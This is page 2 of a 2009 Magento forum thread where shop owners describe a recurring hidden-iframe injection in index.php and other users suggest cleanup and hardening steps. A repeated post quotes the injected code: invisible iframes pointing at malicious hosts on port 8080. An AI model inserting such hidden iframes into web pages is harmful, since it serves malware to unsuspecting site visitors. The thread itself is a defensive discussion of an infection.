Magento Forum

Page 2 of 2
iFrame hack? Can’t acces website or admin anymore… HELP Please
 
Bayview
Jr. Member
 
Total Posts:  12
Joined:  2007-09-07
 
gfxguru - 05 August 2009 05:41 AM

uh you are wrong about the ftp passwords access. I’ve seen this on our server and we don’t have FTP running.

Are there other attack vectors that you know of to your server (ssh etc), or are you convinced that this hack was installed using just the Magento software?

 
Magento Community Magento Community
Magento Community
Magento Community
 
jkhatri427
Jr. Member
 
Total Posts:  3
Joined:  2009-02-06
 

When we try to open admin or front we are getting alert from avast. please see the attached files.

And Index.php is overwrite by some code like
<iframe src="http://c6p.at:8080/ts/in.cgi?pepsi14
<iframe src="http://3b6.ru:8080/index.php" width=131 height=163 style="visibility: hidden"></iframe>

we have now removed this code , but after some time it is again affected by same code.

we are getting some link from google to remove this malware .

1.http://mycodings.blogspot.com/2009/05/remove-malwareiframeinf-virus-from-your.html
2.http://www.magentocommerce.com/boards/viewthread/44203/

I got this email from my website developer - Can someone provide any suggestions and solution?

Thanks a lot for your support.

 
Magento Community Magento Community
Magento Community
Magento Community
 
jkhatri427
Jr. Member
 
Total Posts:  3
Joined:  2009-02-06
 

When we try to open admin or front we are getting alert from avast. please see the attached files.

And Index.php is overwrite by some code like
<iframe src="http://c6p.at:8080/ts/in.cgi?pepsi14
<iframe src="http://3b6.ru:8080/index.php" width=131 height=163 style="visibility: hidden"></iframe>

we have now removed this code , but after some time it is again affected by same code.

we are getting some link from google to remove this malware .

1.http://mycodings.blogspot.com/2009/05/remove-malwareiframeinf-virus-from-your.html
2.http://www.magentocommerce.com/boards/viewthread/44203/

I got this email from my website developer - Can someone provide any suggestions and solution?

Thanks a lot for your support.

Image Attachments
New Image.JPG
 
Magento Community Magento Community
Magento Community
Magento Community
 
b*rock
Member
 
Total Posts:  33
Joined:  2009-01-05
 

What version of Magento are you running?  It looks like a XSS attack.

 
Magento Community Magento Community
Magento Community
Magento Community
 
JLHC
Mentor
 
Avatar
Total Posts:  1287
Joined:  2008-05-09
Tampa, FL
 

@jkhatri427: Run a full system scan on your local computer to remove all viruses and malwares. After that change all your passwords, especially FTP passwords.
Also upgrade your FTP client software to the latest version. Finally, upgrade your Magento to the latest stable version and check in your Magento directory to see whether there are any suspicious files in it.

 
Magento Community Magento Community
Magento Community
Magento Community
 
surfu
Jr. Member
 
Total Posts:  1
Joined:  2009-08-19
 

I too face the same difficulties with the magento. It makes me to restrict the access to the website after that. Please give any suggestions to get away from this issue.

 
Magento Community Magento Community
Magento Community
Magento Community
 
smart2raise
Jr. Member
 
Total Posts:  1
Joined:  2009-08-27
 

Hi Everybody,
I’d a very good knowledge in handling iframe virus (Owner of the blog: http://mycodings.blogspot.com/2009/05/remove-malwareiframeinf-virus-from-your.html). If anybody needs personal assistance kindly contact me. I’ve handled around 30 websites with this issue & till now the results for the sites are good & the client gave me a good feedback.

 
Magento Community Magento Community
Magento Community
Magento Community
 
WebhostUK LTD
Sr. Member
 
Avatar
Total Posts:  163
Joined:  2009-08-27
UK
 

This problem is more over related to server security ..if you have modsec and susphp installed on the server folder and files will have permissions that wont be easy for iframe injection.

 
Magento Community Magento Community
Magento Community
Magento Community
Magento Community
Magento Community
Back to top
Page 2 of 2